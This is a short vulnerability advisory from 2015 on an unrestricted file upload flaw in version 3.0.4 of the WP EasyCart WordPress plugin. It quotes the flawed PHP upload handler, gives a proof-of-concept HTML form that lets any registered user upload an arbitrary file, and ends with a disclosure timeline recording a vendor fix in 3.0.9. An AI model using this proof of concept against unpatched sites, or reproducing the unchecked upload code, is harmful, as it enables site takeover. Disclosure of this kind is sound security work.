08-01-2015 / Vulnerabilities

WordPress Shopping Cart 3.0.4 Unrestricted File Upload

Any registered user can upload any file.

File: wp-easycart\inc\amfphp\administration\banneruploaderscript.php

$date = $_POST['datemd5'];
$usersqlquery = sprintf("SELECT  ec_user.*, ec_role.admin_access FROM  ec_user  LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE  ec_user.password = '%s' AND  (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
$userresult = mysql_query($usersqlquery);
$users = mysql_fetch_assoc($userresult);
if ($users || is_user_logged_in()) {
	$filename = $_FILES['Filedata']['name'];	
	$filetmpname = $_FILES['Filedata']['tmp_name'];	
	$fileType = $_FILES["Filedata"]["type"];
	$fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);
	$explodedfilename = pathinfo($filename);
	$nameoffile = $explodedfilename['filename'];
	$fileextension = $explodedfilename['extension'];	
	move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
}

Proof of Concept

Login as regular user (created using wp-login.php?action=register):

<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
    <input type="hidden" name="datemd5" value="1">
    <input type="file" name="Filedata">
    <input value="Upload!" type="submit">
</form>

File will be visible:

http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%

Timeline

  • 29-10-2014: Discovered
  • 16-11-2014: Vendor notified
  • 17-11-2014: Version 3.0.9 released, issue resolved